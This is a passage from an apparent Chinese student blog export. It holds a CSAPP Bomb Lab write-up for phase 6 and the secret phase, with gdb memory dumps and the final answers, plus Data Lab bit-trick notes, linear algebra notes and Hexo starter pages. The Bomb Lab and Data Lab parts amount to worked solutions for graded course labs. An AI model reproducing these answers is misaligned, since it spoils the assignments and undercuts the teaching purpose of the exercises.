ordinal;<br> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Node</span>* <span class="hljs-title">next</span>;</span><br>}<br></code></pre></td></tr></table></figure><p>struct 链表中 6 个 struct 的地址,按照输入数字的顺序,顺着放到 %rsp +</p><p>循环 3:<br>x /12 0x7fffffffe660<br>0x7fffffffe660: 6308608 0 6308592 0<br>0x7fffffffe670: 6308640 0 6308672 0<br>0x7fffffffe680: 6308656 0 6308624 0</p><p>重排链表</p><p>循环 4:<br>x /24x 0x6042f0</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs dns"><span class="hljs-number">0x6042f0</span> <node1>: <span class="hljs-number">0x00000271</span> <span class="hljs-number">0x00000001</span> <span class="hljs-number">0x00604320</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604300</span> <node2>: <span class="hljs-number">0</span>x<span class="hljs-number">000002f2</span> <span class="hljs-number">0x00000002</span> <span class="hljs-number">0</span>x<span class="hljs-number">006042f0</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604310</span> <node3>: <span class="hljs-number">0x00000111</span> <span class="hljs-number">0x00000003</span> <span class="hljs-number">0x00000000</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604320</span> <node4>: <span class="hljs-number">0x00000231</span> <span class="hljs-number">0x00000004</span> <span class="hljs-number">0x00604340</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604330</span> <node5>: <span class="hljs-number">0</span>x0000016e <span class="hljs-number">0x00000005</span> <span class="hljs-number">0x00604310</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604340</span> <node6>: <span class="hljs-number">0</span>x0000022f <span class="hljs-number">0x00000006</span> <span class="hljs-number">0x00604330</span> <span class="hljs-number">0x00000000</span><br></code></pre></td></tr></table></figure><p>验证每个 struct 的 val >= 链表中下一项的 val<br>val 从大到小:2 1 4 6 5 3</p><h1 id="secret-phase"><a href="#secret-phase" class="headerlink" title="secret phase"></a>secret phase</h1><p>在 phase_defused 中调了 secret_phase:<br>b *0x401772</p><p>(gdb) x /s 0x402660<br>0x402660: “Curses, you’ve found the secret phase!”<br>(gdb) x /s 0x402688<br>0x402688: “But finding it and solving it are quite different…”<br>找对了位置 🤗</p><p>先调用 sscanf:<br>(gdb) x /s 0x40280b<br>0x40280b: “%d %d %s”<br>三个输入</p><p>phase_3 or phase_4? 与 phase_4 读取的 %rdi 地址相同<br>(gdb) x /s 0x6048b0<br>0x6048b0 <input_strings+240>: “5 15 DrEvil”<br><img src="/images/Bomb-Lab/1.png"></p><p>(gdb) x /s 0x402814<br>0x402814: “DrEvil”<br>取第三个输入判等</p><p>综上,在 phase_4 的输入之后再补一个 DrEvil</p><hr><p>secret_phase:</p><p>调用 read_line,读入一个字符串<br>调用 strtol,解析为十进制 num<br>num - 1 <= 1000</p><p>调用 fun7:</p><table><thead><tr><th>%rdi</th><th>%rsi</th></tr></thead><tbody><tr><td>0x604110</td><td>num</td></tr></tbody></table><p>要求返回值为 5</p><p>fun7:<br>递归调用,比较 num 与 (%rdi)+</p><p>x /100xg 0x604110</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs dns"><span class="hljs-number">0x604110</span> <n1>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000024</span> <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604130</span><br><span class="hljs-number">0x604120</span> <n1+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604150</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604130</span> <n21>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000008</span> <span class="hljs-number">0</span>x000000<span class="hljs-number">00006041b0</span><br><span class="hljs-number">0x604140</span> <n21+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604170</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604150</span> <n22>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000032</span> <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604190</span><br><span class="hljs-number">0x604160</span> <n22+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00006041d0</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604170</span> <n32>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000016</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000604290</span><br><span class="hljs-number">0x604180</span> <n32+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604250</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604190</span> <n33>: <span class="hljs-number">0</span>x000000000000002d <span class="hljs-number">0</span>x000000<span class="hljs-number">00006041f0</span><br><span class="hljs-number">0x6041a0</span> <n33+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00006042b0</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6041b0</span> <n31>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000006</span> <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604210</span><br><span class="hljs-number">0x6041c0</span> <n31+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000604270</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6041d0</span> <n34>: <span class="hljs-number">0</span>x000000000000006b <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604230</span><br><span class="hljs-number">0x6041e0</span> <n34+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00006042d0</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6041f0</span> <n45>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000028</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604200</span> <n45+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604210</span> <n41>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000001</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604220</span> <n41+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604230</span> <n47>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000063</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604240</span> <n47+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604250</span> <n44>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000023</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604260</span> <n44+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604270</span> <n42>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000007</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604280</span> <n42+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604290</span> <n43>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000014</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042a0</span> <n43+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042b0</span> <n46>: <span class="hljs-number">0</span>x000000000000002f <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042c0</span> <n46+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042d0</span> <n48>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00000003e9</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br></code></pre></td></tr></table></figure><p>二叉搜索树</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Tree</span>{</span><br> <span class="hljs-type">int</span> val;<br> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Tree</span>* <span class="hljs-title">left</span>;</span><br> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Tree</span>* <span class="hljs-title">right</span>;</span><br>}<br></code></pre></td></tr></table></figure><p><img src="/images/Bomb-Lab/Tree.png" alt="二叉树"></p><p>返回值为 5:右 左 右 0<br>47</p>]]></content>
<categories>
<category>CSAPP</category>
</categories>
</entry>
<entry>
<title>Data Lab</title>
<link href="/2023/12/18/Data-Lab/"/>
<url>/2023/12/18/Data-Lab/</url>
<content type="html"><![CDATA[<ol><li><p>bitXor(x, y)<br>描述:只用 ~ 和 & 实现 ~(x|y)<br>思路:由反演定理,直接得出 ~(x|y) = ~x & ~y</p></li><li><p>copyLSB(x)<br>描述:将 x 的所有位都设置为它的最低位的值<br>思路:利用移位的性质,先将 x 的最低位左移到最高位,再算术右移回来。这样,如果该位是 0 就全为 0,如果是 1 就全补 1。</p></li><li><p>isEqual(x, y)<br>描述:x==y 返回 1,否则返回 0<br>思路:考虑 x==y,可以利用按位异或 ^ 的运算,x==y 时结果为全 0,否则有 1。再跟一个逻辑非 ! 的操作,全 0 则返回 1,否则返回 0。</p></li><li><p>bitMask(highbit, lowbit)<br>描述:生成一个掩码,lowbit 位至 highbit 位均为 1<br>思路:要产生这样一个 low 到 high 均为 1,其余位为 0 的掩码,同样可以利用按位异或 ^ 运算。将一个全 1 的序列分别左移 low 和 high+1 位后再进行异或,就把中间不一致的那一段置为 1,其余为 0。此外,要考虑 lowbit > highbit 的特殊情况,就再补上一个 & low。</p></li><li><p>bitCount(int x)<br>描述:计算 x 中 1 的数目<br>思路 - baseline:采用分治的思想,制作出一个 mask,得出 x 的每字节中 1 的数目,然后将结果折叠到低 8 位中。</p></li><li><p>tmax()<br>描述:返回最大的补码<br>思路:最大的补码即 0x7FFFFFFF,可以由 0x80000000 取反得到。</p></li><li><p>isNonNegative(x)<br>描述:如果 x>=0,返回 1,否则返回 0<br>思路:x 是否非负要看符号位是否为 1,首位右移 31 位再逻辑非 ! 即可。</p></li><li><p>addOK(x, y)<br>描述:确定 x+y 是否不溢出<br>思路:有符号数加法溢出的表现是:两数同号,而与其和异号。据此判断即可。</p></li><li><p>rempwr2(x, n)<br>描述:计算 x % (2^n)<br>思路 - baseline:要计算这个模,对于正数只需取出 x 的低 n 位。考虑负数的情况,可以通过取反加 1 将其转为正数,取出低 n 位,再取反加 1 转回负数。因为不能使用 if 语句,所以将这两种情况统一到绝对值的操作,见第 11 问。</p></li><li><p>isLess(x, y)<br> 描述:如果 x<y,返回 1,否则返回 0<br> 思路:要判断两数大小,异号时直接得出结果,同号时可以借助 x-y 的符号判断。</p></li><li><p>absVal(x)<br> 描述:x 的绝对值<br> 思路:若是正数保持不变,若是负数取反加一。可以通过对 x >> 31 的运算统一这两种操作。</p></li><li><p>isPower2(x)<br> 描述:如果 x 是 2 的幂,返回 1,否则返回 0<br> 思路:即判断 x 除了为 0 的符号位外,是否仅由单独的一位 1 组成。在排除了 x<0 和 x=0 的情况后,对于正数 x,!(x & (x + (~0))) 即可判断是否只有一个 1。</p></li><li><p>float_neg(uf)<br> 描述:计算 -f<br> 思路:位级表示的浮点数,求负数直接符号位取反即可。此外,需要排除为 NAN 的情况,即判断阶码段 E 全 1 且尾数段 M 不为 0。</p></li><li><p>float_half(uf)<br> 描述:返回 0.5*f 的位级表示<br> 思路:对于规格化的情况,除以二相当于在阶码段 E 减 1。考虑为 inf 或 NAN 的情况,判断阶码段 E 为全 1 则直接返回;考虑结果为非规格化的情况,除以二相当于右移一位,还需要考虑浮点数向偶数舍入的要求,判断低二位为 11 时需要打个补丁让结果的最低位为 0。</p></li><li><p>float_i2f(x)<br> 描述:返回 (float)x 的位级表示<br> 思路:如果 x 是 0 直接返回。对于非 0 的情况,通过看 x 除符号位外的第一个 1 在第几位,得到阶码段 E 的值。然后从 x 中摘出尾数段 M 的值。因为要舍去 x 的末 9 位,还要考虑舍入打个补丁。</p></li></ol><hr><p>参考:</p><ul><li><a href="https://zhuanlan.zhihu.com/p/472188244">https://zhuanlan.zhihu.com/p/472188244</a></li><li><a href="https://zhuanlan.zhihu.com/p/661117391">https://zhuanlan.zhihu.com/p/661117391</a></li><li><a href="https://blog.csdn.net/dopamine_joker/article/details/121029939">https://blog.csdn.net/dopamine_joker/article/details/121029939</a></li><li><a href="https://dovahyol.github.io/blog/2017/11/09/bit-count.html">https://dovahyol.github.io/blog/2017/11/09/bit-count.html</a></li></ul>]]></content>
<categories>
<category>CSAPP</category>
</categories>
</entry>
<entry>
<title>Linear Algebra</title>
<link href="/2023/08/17/Linear-Algebra/"/>
<url>/2023/08/17/Linear-Algebra/</url>
<content type="html"><![CDATA[<h2 id="Basics"><a href="#Basics" class="headerlink" title="Basics"></a>Basics</h2><p>矩阵表示线性映射。</p><hr><p>线性方程组 <code>Ax = b</code> 对任意向量 $\vec{b}$:</p><ul><li>有唯一解:矩阵 A 可逆 (invertible),$x = A^{-1} \vec{b}$</li><li>无解:</li></ul><hr><p>矩阵 $A$ = ($\vec{u}$, $\vec{v}$, $\vec{w}$)</p><p>若 $A$ 可逆,则</p><ul><li>$\vec{u}$, $\vec{v}$, $\vec{w}$ 的全部线性组合是整个 3 维空间。</li><li>向量 $\vec{u}$, $\vec{v}$, $\vec{w}$ 线性无关 (linearly independent)。相应地,$Ax = \vec{0}$ 只有零解。</li></ul><p>否则,$\vec{0}$ 可以写成 $\vec{u}$, $\vec{v}$, $\vec{w}$ 的多种线性组合。称矩阵 $A$ 奇异 (singular),向量 $\vec{u}$, $\vec{v}$, $\vec{w}$ 线性相关。</p><p>总结:<br>若方阵 $A$ 的列向量线性无关,则 $A$ 可逆,$Ax = \vec{0}$ 只有零解;<br>若方阵 $A$ 的列向量线性相关,则 $A$ 奇异,$Ax = \vec{0}$ 有无穷多解。</p><hr><p>秩 (rank)</p><h3 id=""><a href="#" class="headerlink" title=""></a></h3><p>正交矩阵 $AA^T = I$</p><h3 id="-1"><a href="#-1" class="headerlink" title=""></a></h3><p><a href="https://zhuanlan.zhihu.com/p/45246414">15. MIT 线性代数—投影 - 知乎</a></p><h2 id="矩阵分解"><a href="#矩阵分解" class="headerlink" title="矩阵分解"></a>矩阵分解</h2><h3 id="特征分解"><a href="#特征分解" class="headerlink" title="特征分解"></a>特征分解</h3><p>$Av = \lambda v$<br><a href="https://zhuanlan.zhihu.com/p/649770264">证明:特征值之和等于迹,特征值之积等于行列式 - 知乎</a></p><p>$A = V diag(λ) V^{−1}$</p><h3 id="SVD-分解"><a href="#SVD-分解" class="headerlink" title="SVD 分解"></a>SVD 分解</h3><p>$A = U \Sigma V^\mathrm T$</p><h3 id="PCA"><a href="#PCA" class="headerlink" title="PCA"></a>PCA</h3><p><a href="http://blog.codinglabs.org/articles/pca-tutorial.html">CodingLabs - PCA 的数学原理</a></p><p>[[概率论 revisted#统计量]]<br>协方差矩阵对角化</p><p>$$ Y=PX $$</p><p>$$<br>\begin{array}{l l l}<br>D & = & \frac{1}{m}YY^\mathsf{T} \<br>& = & \frac{1}{m}(PX)(PX)^\mathsf{T} \<br>& = & \frac{1}{m}PXX^\mathsf{T}P^\mathsf{T} \<br>& = & P(\frac{1}{m}XX^\mathsf{T})P^\mathsf{T} \<br>& = & PCP^\mathsf{T}<br>\end{array}<br>$$</p><h2 id="二次型"><a href="#二次型" class="headerlink" title="二次型"></a>二次型</h2>]]></content>
</entry>
<entry>
<title>My First Post</title>
<link href="/2023/08/11/My-First-Post/"/>
<url>/2023/08/11/My-First-Post/</url>
<content type="html"><![CDATA[<p>暑期 TODO</p><ul><li><input checked="" disabled="" type="checkbox"> hands on AI</li><li><input disabled="" type="checkbox"> missing semester</li><li><input disabled="" type="checkbox"> CODE</li></ul><br/><p>GOGOGO!</p>]]></content>
</entry>
<entry>
<title>Hello World</title>
<link href="/2023/08/11/hello-world/"/>
<url>/2023/08/11/hello-world/</url>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo new <span class="hljs-string">"My New Post"</span><br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo server<br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo generate<br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo deploy<br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
</entry>
</search>